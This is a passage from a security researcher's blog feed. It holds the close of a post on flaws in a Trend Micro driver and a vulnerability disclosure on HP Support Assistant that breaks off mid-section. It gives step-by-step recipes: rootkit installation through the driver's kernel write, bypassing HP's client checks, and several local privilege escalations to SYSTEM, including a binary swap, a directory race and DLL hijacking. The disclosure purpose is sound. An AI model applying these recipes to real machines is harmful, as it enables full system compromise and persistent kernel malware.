The only working theory I have is that for some reason most of their driver is not compatible with <code>NonPagedPoolNx</code> and only their entrypoint is compatible; otherwise, there really isn&apos;t a point.</p><h2 id="delivering-on-my-promise">Delivering on my promise</h2><p>As I promised, you can use Trend Micro&apos;s driver to install your own rootkit. Here is what you need to do:</p><ol><li>Find any <code>NonPagedPool</code> allocation by the driver. As long as you don&apos;t have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the <code>.data</code> section. Preferably, pick an allocation that isn&apos;t used often.</li><li>Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in <code>TMXMSCheckSystemObjectByName2</code>.</li><li>Execute your shellcode by registering an unload routine (directly in <code>.data</code>) or using one of the several other execution methods present in the <code>90004027h</code> dispatch table.</li></ol><p>It&apos;s really as simple as that.</p><h2 id="conclusion">Conclusion</h2><p>I reverse <em>a lot</em> of drivers and you do typically see some pretty dumb stuff, but I was shocked at many of the findings in this article coming from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.</p><p>Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside of the IOCTL handlers includes very risky DKOM. Also, I&apos;m not sure how certain practices such as bruteforcing anything would get through adequate code review processes. For example, the Bruteforcing Processes code doesn&apos;t make sense; are Trend Micro developers not aware of enumerating processes via <code>ZwQuerySystemInformation</code>? What about disabling optimizations? 
Anti-virus already gets flak for slowing down client machines, why would you intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won&apos;t be a Trend Micro customer anytime soon.</p>]]></content:encoded></item><item><title><![CDATA[Several Critical Vulnerabilities on most HP machines running Windows]]></title><description><![CDATA[<p>I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will</p>]]></description><link>https://billdemirkapi.me/several-critical-vulnerabilities-on-most-hp-machines-running-windows/</link><guid isPermaLink="false">60277106d8acfdb32a87709b</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 03 Apr 2020 12:31:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/HP-Support-Assistant-for-Notebooks_1.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/HP-Support-Assistant-for-Notebooks_1.png" alt="Several Critical Vulnerabilities on most HP machines running Windows"><p>I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? 
Pre-installed bloatware is the most interesting because it provides a new attack surface impacting a significant number of users who leave the software on their machines.</p><p>For the past year, I&apos;ve been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the <a href="https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/">Remote Code Execution</a> and the <a href="https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/">Local Privilege Escalation</a> vulnerabilities I found in Dell&apos;s own pre-installed bloatware. More often than not, I have found that this class of software has little to no security oversight, leading to poor code quality and a significant number of security issues.</p><p>In this blog post, we&apos;ll be looking at <a href="https://www8.hp.com/us/en/campaigns/hpsupportassistant/hpsupport.html">HP Support Assistant</a>, which is &quot;pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems&quot;. We&apos;ll be walking through several vulnerabilities, taking a close look at discovering and exploiting them.</p><h1 id="general-discovery">General Discovery</h1><p>Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.</p><p>Opening a few of the binaries in <a href="https://github.com/0xd4d/dnSpy">dnSpy</a> revealed that they were &quot;packed&quot; by <a href="https://www.red-gate.com/products/dotnet-development/smartassembly/">SmartAssembly</a>. 
This is an ineffective attempt at security through obscurity, as <a href="https://github.com/0xd4d/de4dot">de4dot</a> quickly deobfuscated the binaries.</p><p>On start, HP Support Assistant will begin hosting a &quot;service interface&quot; which exposes over 250 different functions to the client. This contract interface is exposed by a <a href="https://docs.microsoft.com/en-us/dotnet/framework/wcf/samples/netnamedpipebinding">WCF Net Named Pipe</a> for access on the local system. A client connects to the interface by connecting to the pipe <code>net.pipe://localhost/HPSupportSolutionsFramework/HPSA</code>.</p><p>This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be &quot;validated&quot;. The client does this by calling on the interface method <code>StartClientSession</code> with a random string as the first argument. The service will take this random string and start two new pipes for that client.</p><p>The first pipe is called <code>\\.\pipe\Send_HPSA_[random string]</code> and the second is called <code>\\.\pipe\Receive_HPSA_[random string]</code>. As the names imply, HP uses two different pipes for sending and receiving messages.</p><p>After creating the pipes, the client will send the string &quot;Validate&quot; to the service. When the service receives any message over the pipe except &quot;close&quot;, it will automatically validate the client &#x2013; regardless of the message contents (&quot;abcd&quot; will still cause validation).</p><p>The service starts by obtaining the process ID of the process it is communicating with using <code>GetNamedPipeClientProcessId</code> on the pipe handle. 
The service then grabs the full image file name of the process for verification.</p><p>The first piece of verification is to ensure that the <a href="https://docs.microsoft.com/en-us/dotnet/api/system.diagnostics.process.mainmodule?view=netframework-4.8">&quot;main module&quot; property</a> of the C# Process object equals the image name returned by <code>GetProcessImageFileName</code>.</p><p>The second verification checks that the process file is not only signed, but the subject of its certificate contains <code>hewlett-packard</code>, <code>hewlett packard</code>, or <code>o=hp inc</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ySvEYwu.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The next verification checks the process image file name for the following:</p><ol><li>The process path is &quot;rooted&quot; (not a relative path).</li><li>The path does not start with <code>\</code>.</li><li>The path does not contain <code>..</code>.</li><li>The path does not contain <code>.\</code>.</li><li>The path is not a reparse or junction point.</li></ol><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/0RUpSjM.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The last piece of client verification is checking that <em>each</em> parent process passes the previous verification steps AND starts with:</p><ol><li><code>C:\Program Files[ (x86)]</code></li><li><code>C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\</code></li><li><code>C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\</code></li><li>or <code>C:\Windows</code> (excluding <code>C:\Windows\Temp</code>)</li></ol><p>If you pass all of these checks, then your &quot;client session&quot; is added to a list of valid clients. 
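The path checks above (minus the reparse-point check, which requires querying the filesystem) can be approximated in a few lines of C; this is a sketch of the logic, not HP's actual code:

```c
#include <string.h>

/* Approximation of HP's image-path sanity checks: the path must be
 * rooted at a drive letter, must not start with a bare backslash,
 * and must not contain ".." or ".\" sequences. Returns 1 on pass. */
int passes_path_checks(const char *path)
{
    if (path == NULL || path[0] == '\\')
        return 0;
    /* "rooted": drive letter, colon, backslash */
    if (strlen(path) < 3 || path[1] != ':' || path[2] != '\\')
        return 0;
    if (strstr(path, "..") != NULL || strstr(path, ".\\") != NULL)
        return 0;
    return 1;
}
```

As the later sections show, checks of this kind constrain which path string is presented, not which code is actually running, which is why they end up being bypassable.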
A 4-byte integer is generated as a &quot;client ID&quot; which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method <code>GetClientToken</code> and passing the client ID it received earlier.</p><p>One extra check is performed on the process file name. If the process file name is one of:</p><ol><li><code>C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe</code></li><li><code>C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe</code></li><li><code>C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe</code></li></ol><p>Then your token is added to a list of &quot;trusted tokens&quot;. Using this token, the client can now call certain protected methods.</p><p>Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the &quot;service methods&quot;, the service often accepts several parameters about an &quot;action&quot; to take via a structure called the <code>ActionItemBase</code>. This structure has several pre-defined properties for a variety of methods that are set by the client. Anytime you see a reference to an &quot;action item base property&quot;, understand that this property is under the complete control of an attacker.</p><p>In the following sections, we&#x2019;ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.</p><h1 id="general-exploitation">General Exploitation</h1><p>Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are &quot;protected&quot;, which means we will need to be able to call these functions to maximize the potential attack surface. 
Let&#x2019;s take a look at some of the mitigations discussed above and how we can bypass them.</p><p>A real issue for HP is that the product is insecure by design. There are mitigations which I think serve a purpose, such as the integrity checks mentioned in the previous section, but HP is really fighting a battle they&#x2019;ve already lost. This is because core components, such as HP Web Product Detection, rely on access to the service and run in an unprivileged context. The fact is, the way the HP Service is currently designed, it <strong>must</strong> be able to receive messages from unprivileged processes. As long as unprivileged processes can reach the service, there will always be a way to talk to it.</p><p>The first choice I made was adding the <code>HP.SupportFramework.ServiceManager.dll</code> binary as a reference to my C# proof-of-concept payload, because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself, and even if there were, it wouldn&apos;t have mattered because it was a client-side DLL I controlled. The important checks are on the &quot;server&quot; or service side, which handles incoming client connections.</p><p>The first important check to bypass is the second one, where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (e.g. <a href="https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf">Process Doppelg&#xE4;nging</a>), but the route I took was starting a signed HP binary <em>suspended</em> and then injecting my malicious C# DLL. 
This gave me the context of being from an HP program because I started the signed binary at its real path (in Program Files x86, etc).</p><p>To bypass the checks on the parent processes of the connecting client process, I opened a <code>PROCESS_CREATE_PROCESS</code> handle to the Windows Explorer process and used the <code>PROC_THREAD_ATTRIBUTE_PARENT_PROCESS</code> attribute to spoof the parent process.</p><p>Feel free to look at the other mitigations; this method bypasses all of them, maximizing the attack surface of the service.</p><h1 id="local-privilege-escalation-vulnerabilities">Local Privilege Escalation Vulnerabilities</h1><h2 id="discovery-local-privilege-escalation-1-to-3">Discovery: Local Privilege Escalation #1 to #3</h2><p>Before getting into exploitation, we need to review the context required to understand each vulnerability.</p><p>Let&#x2019;s start with the protected service method named <code>InstallSoftPaq</code>. I don&#x2019;t really know what &quot;SoftPaq&quot; stands for, maybe software package? Regardless, this method is used to install HP updates and software.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/LD6Hr3Q.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The method takes three arguments. First is an <code>ActionItemBase</code> object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly; it has little to no purpose because the service method uses the <code>ActionItemBase</code> to decide if it&apos;s installing directly.</p><p>The method begins by checking whether or not the action item base <code>ExecutableName</code> property is empty. 
If it is, the executable name will be resolved by concatenating both the action item base <code>SPName</code> property and <code>.exe</code>.</p><p>If the action item base property <code>SilentInstallString</code> is not empty, it will take a different route for executing the installer. This method is assumed to be the &quot;silent install&quot; method whereas the other one is a direct installer.</p><h3 id="silent-install">Silent Install</h3><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/HIHWRNS.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>When installing silently, the service will first check if an <code>Extract.exe</code> exists in <code>C:\Windows\TEMP</code>. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP&apos;s installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/z3MiryO.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>The method will then check to make sure that <code>C:\Windows\TEMP</code> + the action item base property <code>ExecutableName</code> exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see <a>General Discovery</a> for a detailed description of the verification).</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/A9ZHIOr.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>If the <code>SilentInstallString</code> property of the action item base contains the <code>SPName</code> property + <code>.exe</code>, the current directory for the new process will be the temporary directory. 
Otherwise, the method will set the current directory for the new process to <code>C:\swsetup\</code> + the <code>ExecutableName</code> property.</p><p>Furthermore, if the latter, the service will start the previously copied <code>Extract.exe</code> binary and attempt to extract the download into current directory + the <code>ExecutableName</code> property after stripping <code>.exe</code> from the string. If the extraction folder already exists, it is deleted before execution. When the <code>Extract.exe</code> binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception that occurred, the download is stopped in its tracks.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/EXTfCPe.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>After determining the working directory and extracting the download if necessary, the method splits the <code>SilentInstallString</code> property into an array using a double quote as the delimiter.</p><p>If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains <code>.exe</code>, <code>.msi</code>, or <code>.cmd</code>. If it does not, the installation is stopped.</p><p>The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with <code>.exe</code> stripped + <code>\</code> + the second element. For example, if the second element was <code>cat.exe</code> and the executable name property was <code>cats</code>, the resolved path would be the current directory + <code>\cats\cat.exe</code>. 
If this resolved path does not exist, the installation stops.</p><p>If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary are the silent install string, with the resolved path removed from it. The installation timeout (minutes) is dictated by the second argument passed to <code>InstallSoftPaq</code>.</p><p>After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.</p><h3 id="direct-install">Direct Install</h3><p>When no silent install string is provided, a method named <code>StartInstallSoftpaqsDirectly</code> is executed.</p><p>The method will check to make sure that the result of the <a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine">Path.Combine</a> method with <code>C:\Windows\TEMP</code> and the action item base property <code>ExecutableName</code> as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see <a>General Discovery</a> for a detailed description of the verification).</p><p>The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group, and if an Administrator is logged in, the specified program is executed immediately.</p><h2 id="exploitation-local-privilege-escalation-1-to-3">Exploitation: Local Privilege Escalation #1 to #3</h2><h3 id="local-privilege-escalation-1">Local Privilege Escalation #1</h3><p>The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named <code>InstallSoftPaq</code>. 
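</p><p>Before diving into the individual bugs, the path-resolution dance above is worth restating in code. This is a simplified Python reconstruction of the decompiled logic (not HP&apos;s code), using the <code>.exe</code>/<code>.msi</code>/<code>.cmd</code> extension check described earlier:</p>

```python
def resolve_install_path(executable_name: str, sp_name: str,
                         silent_install_string: str,
                         temp_dir: str = "C:\\Windows\\TEMP") -> str:
    """Simplified reconstruction of the silent-install path resolution."""
    # Current directory: TEMP if SilentInstallString references SPName.exe,
    # otherwise C:\swsetup\ + ExecutableName with ".exe" stripped.
    if sp_name + ".exe" in silent_install_string:
        current_dir = temp_dir
    else:
        current_dir = "C:\\swsetup\\" + executable_name.replace(".exe", "")
    # SilentInstallString is split on double quotes; the second element
    # names the binary to run.
    parts = silent_install_string.split('"')
    if len(parts) < 2:
        raise ValueError("invalid silent install string")
    binary_name = parts[1]
    if not any(ext in binary_name for ext in (".exe", ".msi", ".cmd")):
        raise ValueError("binary name must reference .exe/.msi/.cmd")
    return current_dir + "\\" + binary_name
```

<p>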
Quoting the discovery portion of this section,</p><blockquote>When installing silently, the service will first check if an <code>Extract.exe</code> exists in <code>C:\Windows\TEMP</code>. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP&apos;s installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.</blockquote><p>This is where the bug lies. Unprivileged users can write to <code>C:\Windows\TEMP</code>, but cannot enumerate the directory (<a href="https://twitter.com/mattifestation/status/1172520995472756737">thanks Matt Graeber</a>!). This allows an unprivileged attacker to write a malicious binary named <code>Extract.exe</code> to <code>C:\Windows\TEMP</code>, appending enough NULL bytes to match the size of the actual <code>Extract.exe</code> in HP&apos;s installation directory.</p><p>Here are the requirements of the attacker-supplied action item base:</p><ol><li>The action item base property <code>SilentInstallString</code> must be defined to something other than an empty string.</li><li>The temporary path (<code>C:\Windows\TEMP</code>) + the action item base property <code>ExecutableName</code> must be a real file.</li><li>This file must also be signed by HP.</li><li>The action item base property <code>SilentInstallString</code> must not contain the value of the property <code>SPName</code> + <code>.exe</code>.</li></ol><p>If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as <code>NT AUTHORITY\SYSTEM</code> achieving Local Privilege Escalation.</p><h3 id="local-privilege-escalation-2">Local Privilege Escalation #2</h3><p>The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named <code>InstallSoftPaq</code>. 
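</p><p>Before walking through #2&apos;s requirements, note that the only comparison on the planted <code>Extract.exe</code> from #1 is its file length, and trailing NULL bytes land past a PE&apos;s declared sections as overlay data the loader ignores. A quick sketch of the padding step (an illustrative helper of mine, not code from the original exploit):</p>

```python
def pad_to_length(payload: bytes, target_len: int) -> bytes:
    """Pad a payload with NULL bytes so its length matches the trusted
    Extract.exe, defeating a length-only file comparison. Trailing NULLs
    sit past the PE's declared sections, so the loader ignores them."""
    if len(payload) > target_len:
        raise ValueError("payload is larger than the trusted binary")
    return payload + b"\x00" * (target_len - len(payload))
```

<p>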
Let&#x2019;s review what requirements we need to pass in order to have the method start our malicious binary.</p><ol><li>The action item base property <code>SilentInstallString</code> must be defined to something other than an empty string.</li><li>The temporary path (<code>C:\Windows\TEMP</code>) + the action item base property <code>ExecutableName</code> must be a real file.</li><li>This file must also be signed by HP.</li><li>If the <code>SPName</code> property + <code>.exe</code> is in the <code>SilentInstallString</code> property, the current directory is <code>C:\Windows\TEMP</code>. Otherwise, the current directory is <code>C:\swsetup\</code> + the <code>ExecutableName</code> property with <code>.exe</code> stripped. The resulting path does not need to exist.</li><li>The action item base property <code>SilentInstallString</code> must have at least one double quote.</li><li>The action item base property <code>SilentInstallString</code> must have a valid executable name after the first double quote (i.e a valid value could be <code>something&quot;cat.exe</code>). This executable name is the &quot;binary name&quot;.</li><li>The binary name must contain <code>.exe</code> or <code>.msi</code>.</li><li>The file at current directory + <code>\</code> + the binary name must exist.</li></ol><p>If all of these requirements are passed, the method will execute the binary at current directory + <code>\</code> + binary name.</p><p>The eye-catching part about these requirements is that we can cause the &quot;current directory&quot;, where the binary gets executed, to be in a directory path that can be created with low privileges. Any user is able to create folders in the <code>C:\</code> directory, therefore, we can create the path <code>C:\swsetup</code> and have the current directory be that.</p><p>We need to make sure not to forget that the executable name has <code>.exe</code> stripped from it and this directory is created within <code>C:\swsetup</code>. 
For example, if we pass the executable name as <code>dog.exe</code>, we can have the current directory be <code>C:\swsetup\dog</code>. The only requirement if we go this route is that the same executable name exists in <code>C:\Windows\TEMP</code>. Since unprivileged users can write into the <code>C:\Windows\TEMP</code> directory, we can simply write a <code>dog.exe</code> into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary in the <code>C:\swsetup\dog</code> directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.</p><p>A side-effect of having swsetup as our current directory is that the method will first try to &quot;extract&quot; the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because we can easily tell when the function is about to execute, allowing us to quickly copy in the malicious binary after re-creating the directory.</p><p>After extraction is attempted and after we place our malicious binary, the method will grab the filename to execute by grabbing the string after the first double quote character in the <code>SilentInstallString</code> parameter. This means if we set the parameter to be <code>a&quot;BadBinary.exe</code>, the complete path for execution will be the current directory + <code>BadBinary.exe</code>. Since our current directory is <code>C:\swsetup\dog</code>, the complete path to the malicious binary becomes <code>C:\swsetup\dog\BadBinary.exe</code>. The only check on the file specified after the double quote is that it exists; there are no signature checks.</p><p>Once the final path is determined, the method starts the binary. 
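</p><p>The &quot;wait for the delete, then recreate and copy&quot; trick is a classic filesystem race. Here is a best-effort Python sketch of that watch-and-swap loop; the paths and payload name follow the running example, and the polling interval is an arbitrary choice of mine:</p>

```python
import os
import shutil
import time

def race_swsetup(watch_dir: str = "C:\\swsetup\\dog",
                 payload: str = "BadBinary.exe",
                 timeout: float = 30.0) -> None:
    """Wait for the service to delete the swsetup directory, then
    immediately recreate it and drop the unsigned payload inside."""
    deadline = time.time() + timeout
    # The service deletes the directory right before extraction/execution.
    while os.path.isdir(watch_dir):
        if time.time() > deadline:
            raise TimeoutError("service never deleted the directory")
        time.sleep(0.001)
    # Recreate the directory and plant the payload before execution.
    os.makedirs(watch_dir, exist_ok=True)
    shutil.copy(payload, os.path.join(watch_dir, "BadBinary.exe"))
```

<p>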
For us, this means our malicious binary is executed.<br>To review the example above:</p><ol><li>We place a <em>signed</em> HP binary named <code>dog.exe</code> in <code>C:\Windows\TEMP</code>.</li><li>We create the directory chain <code>C:\swsetup\dog</code>.</li><li>We pass in an action item base with the <code>ExecutableName</code> property set to <code>dog.exe</code>, the <code>SPName</code> property set to anything but <code>BadBinary</code>, and the <code>SilentInstallString</code> property set to <code>a&quot;BadBinary.exe</code>.</li><li>We monitor the <code>C:\swsetup\dog</code> directory until it is deleted.</li><li>Once we detect that the <code>dog</code> folder is deleted, we immediately recreate it and copy in our <code>BadBinary.exe</code>.</li><li>Our <code>BadBinary.exe</code> gets executed with SYSTEM permissions.</li></ol><h3 id="local-privilege-escalation-3">Local Privilege Escalation #3</h3><p>The next Local Privilege Escalation vulnerability is accessible by both the previous protected method <code>InstallSoftpaq</code> and <code>InstallSoftpaqDirectly</code>. This exploit lies in the previously mentioned <em>direct</em> install method.</p><p>This method starts off similarly to its silent install counterpart by concatenating <code>C:\Windows\TEMP</code> and the action item base <code>ExecutableName</code> property. Again similarly, the method will verify that the path specified is a binary signed by HP. 
The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses <a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine">Path.Combine</a>, the safe way to concatenate path strings.</p><p><a href="https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine">Path.Combine</a> is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/b05UBTC.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>What this means for us as an attacker is that our <code>ExecutableName</code> property cannot escape the <code>C:\Windows\TEMP</code> directory, because <code>/</code> is one of the blacklisted characters.</p><p>This isn&#x2019;t a problem, because unprivileged processes CAN write directly to <code>C:\Windows\TEMP</code>. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here&#x2019;s the small issue with that, the HP Certificate check.</p><p>How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it, this isn&#x2019;t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.</p><p>DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. 
One of the first locations Windows searches when loading a dynamically linked library <a href="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#standard-search-order-for-desktop-applications">is the current directory</a>. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.</p><p>I picked at random from the abundant supply of signed HP binaries. For this attack, I went with <code>HPWPD.exe</code>, which is HP&#x2019;s &quot;Web Products Detection&quot; binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find &quot;missing&quot; dynamically loaded libraries? <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon">Procmon</a> to the rescue!</p><p>Using three simple filters and then running the binary, we&#x2019;re able to easily determine a missing library.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/HJk6WyT.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/EBvWMEh.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>Now we have a few candidates here. <code>C:\VM</code> is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those <code>CreateFile</code> operations usually means that the binary was attempting to load a dynamically linked library and was checking the current directory for it. 
For attacking purposes, I went with <code>RichEd20.dll</code> just because it&apos;s the first one I saw.</p><p>To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it <code>RichEd20.dll</code>, and stick it with the binary in <code>C:\Windows\TEMP</code>. Once we call the direct install method passing the <code>HPWPD.exe</code> binary as the <code>ExecutableName</code> property, the method will start it as the SYSTEM user, and then the binary will load our malicious DLL, escalating our privileges.</p><h2 id="discovery-local-privilege-escalation-4">Discovery: Local Privilege Escalation #4</h2><p>The next protected service method to look at is <code>DownloadSoftPaq</code>.</p><p>To start with, this method takes in an action item base, a String parameter called <code>MD5URL</code>, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/Oh3mLbr.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>If we pass in true for the parameter <code>isManualInstall</code> AND the action item base property <code>UrlResultUI</code> is not empty, we&#x2019;ll use <code>UrlResultUI</code> as the download URL. Otherwise, we&#x2019;ll use the action item base property <code>UrlResult</code> as the download URL. If the download URL does not start with <code>http</code>, the method will prepend <code>http://</code> to it.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/3RIY3K5.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>This is an interesting check. The method will make sure that the Host of the specified download URL ends with either <code>.hp.com</code> OR <code>.hpicorp.net</code>. 
If this check fails, the download will not continue.</p><p>Another check is making a <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD">HEAD request</a> to the download URL and ensuring the response header <code>Content-Length</code> is greater than 0. If an invalid content length header is returned, the download won&#x2019;t continue.</p><p>The location of the download is the combination of <code>C:\Windows\TEMP</code> and the action item base <code>ExecutableName</code> property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is an internet connection, the content length of the download URL is greater than 0, and the URL is &quot;valid&quot;, the download is initiated.</p><p>If the action item base <code>ActionType</code> property is equal to &quot;PrinterDriver&quot;, the method makes sure the downloaded file&#x2019;s MD5 hash equals the one specified in the <code>CheckSum</code> property or the one obtained from HP&#x2019;s CDN server.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/YrdaW2L.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/ZlzhL6u.png" class="kg-image" alt="Several Critical Vulnerabilities on most HP machines running Windows" loading="lazy"></figure><p>After the file has completed downloading, the final verification step is done. The <code>VerifyDownloadSignature</code> method will check if the downloaded file is signed. 
If the file is not signed and the <code>shouldDelete</code> argument is true, the method will delete the downloaded file and return that the download failed.</p><h2 id="exploitation-local-privilege-escalation-4">Exploitation: Local Privilege Escalation #4</h2><p>Let&#x2019;s say I wanted to abuse <code>DownloadSoftPaq</code> to download my file to anywhere in the system, how could I do this?</p><p>Let&#x2019;s take things one at a time, starting with the first challenge, the download URL. Now the only real check done on this URL is making sure the host of the URL <code>http://[this part]/something</code> ENDS with <code>.hp.com</code> or <code>.hpicorp.net</code>. As seen in the screenshot of this check above, the method takes the safe approach of using C#&#x2019;s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a &quot;zero day&quot; in C#&#x2019;s parsing of host names, we&#x2019;ll need to approach the problem a different way.</p><p>Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we&#x2019;re going after a Local Privilege Escalation bug, that would be pretty lame. How about this&#x2026; C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my &quot;tricks&quot; for getting a web bug primitive.</p><p>Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross-site scripting vulnerability, but I&#x2019;m not really in the mood to pentest. What can I do? Let me introduce you to an attacker&#x2019;s best friend, <a href="https://www.openbugbounty.org/">&quot;OpenBugBounty&quot;</a>! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security addresses at the vulnerable domain to report the issue. 
